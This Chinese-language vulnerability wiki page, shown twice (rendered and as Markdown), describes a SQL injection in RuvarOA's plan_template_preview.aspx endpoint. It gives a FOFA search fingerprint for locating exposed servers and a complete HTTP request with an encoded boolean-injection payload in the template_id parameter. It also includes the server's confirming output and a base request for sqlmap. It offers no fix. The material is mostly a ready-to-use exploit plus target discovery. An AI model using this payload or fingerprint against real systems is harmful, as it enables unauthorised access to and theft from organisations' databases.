fofamini-wiki

登录白背景

源码

RuvarOA plan_template_preview存在SQL注入漏洞

一、漏洞简介

RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合，基于Windows平台，构建在大型关系数据库管理系统基础上的，以行政办公为核心，以集成融通业务办公为目标，将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。RuvarOA plan_template_preview存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

RuvarOA v6.01
RuvarOA v12.01

三、资产测绘

fofabody="txt_admin_key"
特征

四、漏洞复现

GET /WorkPlan/plan_template_preview.aspx?template_id=%28SELECT+CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%28113%29%2B%28CASE+WHEN+%281485%3D1485%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%29 HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

qbpvq1qjvjq

sqlmap

GET /WorkPlan/plan_template_preview.aspx?template_id=1 HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

原文: https://www.yuque.com/xiaokp7/ocvun2/co3h0rib4y8b0m6y

# RuvarOA plan_template_preview存在SQL注入漏洞

# 一、漏洞简介
RuvarOA办公自动化系统是广州市璐华计算机科技有限公司采用组件技术和Web技术相结合，基于Windows平台，构建在大型关系数据库管理系统基础上的，以行政办公为核心，以集成融通业务办公为目标，将网络与无线通讯等信息技术完美结合在一起设计而成的新型办公自动化应用系统。RuvarOA plan_template_preview存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- RuvarOA v6.01 
- RuvarOA v12.01

# 三、资产测绘

- fofa`body="txt_admin_key"`
- 特征

![image.png](./img/0HpcEaRq6oS8a07-/1715412038765-d7c66ac0-f855-49ad-bc97-9b535cebff1d-011000.png)

# 四、漏洞复现
```
GET /WorkPlan/plan_template_preview.aspx?template_id=%28SELECT+CHAR%28113%29%2BCHAR%2898%29%2BCHAR%28112%29%2BCHAR%28118%29%2BCHAR%28113%29%2B%28CASE+WHEN+%281485%3D1485%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%29 HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
```
![image.png](./img/0HpcEaRq6oS8a07-/1715412477715-a0e5ab4d-2ad0-4483-854c-3d423638f433-930479.png)
```
qbpvq1qjvjq
```
sqlmap
```
GET /WorkPlan/plan_template_preview.aspx?template_id=1 HTTP/1.1
Host: 
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-HK;q=0.8,zh-TW;q=0.7,zh-CN;q=0.6,zh;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
```
![image.png](./img/0HpcEaRq6oS8a07-/1715412507935-3cf3cb08-126e-4712-9e93-895127a1c12e-249239.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/co3h0rib4y8b0m6y>